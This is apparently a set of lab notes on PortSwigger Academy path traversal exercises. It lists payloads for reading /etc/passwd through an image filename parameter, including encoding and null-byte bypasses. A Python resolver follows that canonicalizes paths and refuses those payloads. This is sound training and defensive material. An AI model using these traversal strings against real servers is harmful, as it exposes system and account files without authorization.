
PortSwigger Academy Notes: Path Traversal

Goal: Read /etc/passwd

Lab Solutions

Lab1 - Basic:
/image?filename=../../../../../../../etc/passwd

Lab2 - Absolute Path:
/image?filename=/etc/passwd

Lab3 - Recursively removing ../:
/image?filename=....//....//....//etc/passwd

Lab4 - Wack URL Encoding:
..%252f..%252f..%252fetc%252fpasswd
[Resource for this one](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work).

Lab4 - Path Verification:
/image?filename=/var/www/images/../../../etc/passwd

Lab5 - Null Byte:
/image?filename=/../../../etc/passwd%00.png
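
A server-side check that refuses the traversal payloads listed above, as an added example that is not part of the original notes: it canonicalizes the requested name and confirms the result stays under the image root. The names `safe_image_path` and `check_all`, and the use of `/var/www/images` as the root, are assumptions for illustration.

```python
import os
from urllib.parse import unquote

# Assumption: image root taken from the path-verification payload on this page.
BASE_DIR = "/var/www/images"

def safe_image_path(filename, base_dir=BASE_DIR):
    """Return the canonical path under base_dir, or None if the request is refused.

    `filename` is the parameter value after the framework's single URL-decode.
    """
    # A NUL would truncate the name in C-level file APIs; never strip it, refuse it.
    if "\x00" in filename:
        return None
    # Escapes that survive the first decode mean double encoding; refuse rather
    # than decode a second time after validation.
    if unquote(filename) != filename:
        return None
    base = os.path.realpath(base_dir)
    # join() drops `base` when filename is absolute; realpath() collapses ../
    # and symlinks, so the check runs on the path the OS would really open.
    candidate = os.path.realpath(os.path.join(base, filename))
    # Compare whole components, not a string prefix.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

# Filename values from the labs above, as sent on the wire (constructed list).
LAB_PAYLOADS = [
    "../../../../../../../etc/passwd",
    "/etc/passwd",
    "....//....//....//etc/passwd",
    "..%252f..%252f..%252fetc%252fpasswd",
    "/var/www/images/../../../etc/passwd",
    "/../../../etc/passwd%00.png",
]

def check_all(payloads=LAB_PAYLOADS):
    """Map each raw payload to the resolver's verdict after one URL-decode."""
    return {raw: safe_image_path(unquote(raw)) for raw in payloads}

if __name__ == "__main__":
    for raw, verdict in check_all().items():
        print(f"{raw!r:45} -> {verdict}")
```

The `....//` value is not refused: with no stripping filter in front of it, it resolves to a literal directory named `....` inside the image root, so it never reaches `/etc/passwd`.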
This post is licensed under CC BY 4.0